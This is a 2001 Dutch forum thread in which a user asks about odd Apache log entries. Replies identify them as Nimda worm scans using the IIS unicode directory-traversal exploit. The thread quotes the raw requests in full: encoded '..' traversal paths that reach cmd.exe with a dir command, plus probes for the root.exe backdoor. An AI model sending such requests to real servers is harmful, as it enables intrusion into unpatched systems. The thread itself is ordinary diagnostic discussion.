Toon posts:

[apache] vaag spul in logfile

Pagina: 1
Acties:
  • 67 views sinds 30-01-2008

vrijdag 5 oktober 2001 15:29

Acties:
  • Insano
  • Registratie: Juni 2001
  • Laatst online: 17-02 21:33

Insano

Topicstarter
ok, ik heb een vaag iets.. zit ik zo mn logfile van apache na te kijke.. zie ik er heel vaak dit soort zooi door
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.84.5.228 - - [05/Oct/2001:00:08:04 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.84.5.228 - - [05/Oct/2001:00:08:05 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.84.5.228 - - [05/Oct/2001:00:08:05 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.84.5.228 - - [05/Oct/2001:00:19:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
213.84.5.228 - - [05/Oct/2001:00:19:20 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
213.84.5.228 - - [05/Oct/2001:00:19:20 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.84.5.228 - - [05/Oct/2001:00:19:20 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.84.5.228 - - [05/Oct/2001:00:19:21 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.84.5.228 - - [05/Oct/2001:00:19:21 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.84.5.228 - - [05/Oct/2001:00:19:21 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.84.5.228 - - [05/Oct/2001:00:19:21 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

weet iemand WTF het is? :?

thanx alvast

//edit

Het staat er echt VAAK in! :( en ook steeds vanaf zelfde IP :(

vrijdag 5 oktober 2001 15:31

Acties:
  • HGM
  • Registratie: April 2000
  • Niet online

HGM

je loopt een klein beetje achter..

Verder niets ernstigs voor Apache.

vrijdag 5 oktober 2001 15:34

Acties:
  • Insano
  • Registratie: Juni 2001
  • Laatst online: 17-02 21:33

Insano

Topicstarter
ja keeh, dit is ook niet het laatste toegevoegd.. maarja et staat overal..

ok, dus et is niets vaags? waarvan/voor is et dan :?

omdat ik namelijk al een berg .eml files in mn server DIR heb gehad.. (was dat nimba zooi) en die hebbik wel weer verwijderd. (met tooltje) dus vandaar..

vrijdag 5 oktober 2001 15:44

Acties:
  • reddog33hummer
  • Registratie: Oktober 2001
  • Laatst online: 25-04 19:21

reddog33hummer

Dat schept mogelijkheden

dat is de unicode exploit voor IIS

en hij is aan het kijken of je al geinfecteerd bent met nimda (root.exe)

heb je onder apache geen last van, zal vast nimda zijn.
of iemand anders die probeert jouw box te hacken maar denkt dat het een IIS bak is :)

Backup not found (R)etry (A)bort (P)anic<br\>AMD 3400+ 64, 2 GB DDR, 1,5 TB Raid5

vrijdag 5 oktober 2001 18:35

Acties:
  • ACM
  • Registratie: Januari 2000
  • Niet online

ACM

Software Architect

Werkt hier

zoek es op/naar het nimda virus.

Dit topic is gesloten.